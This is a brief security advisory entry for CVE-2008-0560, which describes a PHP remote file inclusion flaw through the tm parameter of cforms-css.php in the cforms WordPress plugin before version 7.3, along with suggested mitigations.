CVE-2008-0560

Name of the Vulnerable Software and Affected Versions cforms (contactforms) versions prior to 7.3

Description The issue allows remote attackers to execute arbitrary PHP code via a URL in the tm parameter in the cforms-css.php file. This is a PHP remote file inclusion vulnerability in the Oliver Seidel cforms (contactforms) Wordpress plugin. Note that version 7.3 is disputed as affected since it lacks the tm parameter and would result in a fatal error due to an undefined function call.

Recommendations For versions prior to 7.3, consider disabling the cforms-css.php file or restricting access to it until a patch is available. Avoid using the tm parameter in affected API endpoints until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.